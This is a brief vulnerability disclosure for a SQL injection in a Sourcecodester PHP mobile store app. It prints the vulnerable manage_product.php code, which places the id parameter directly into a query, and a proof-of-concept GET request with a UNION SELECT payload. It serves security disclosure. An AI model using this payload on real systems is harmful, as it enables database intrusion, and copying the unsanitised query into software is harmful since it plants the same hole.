SQL Injection in Mobile Management Store.md

Sourcecodester / Mobile Management Store - SQL Injection

Vendor Homepage:

https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html

Affected Component

/admin/product/manage_product.php

Code

<?php
if(isset($_GET['id']) && $_GET['id'] > 0){
    $qry = $conn->query("SELECT * from `products` where id = '{$_GET['id']}' ");
    if($qry->num_rows > 0){
        foreach($qry->fetch_assoc() as $k => $v){
            $$k=stripslashes($v);
        }
    }
}
?>

Proof of Concept

HTTP Request Example

GET /mobile_store/admin/?page=product/manage_product&id=1'+AND+FALSE+UNION+SELECT+1,2,3,4,version(),6,7,8--+- HTTP/1.1
Host: [REDACTED]
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close

Screenshot

CWE

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Credits

Russel James Avenido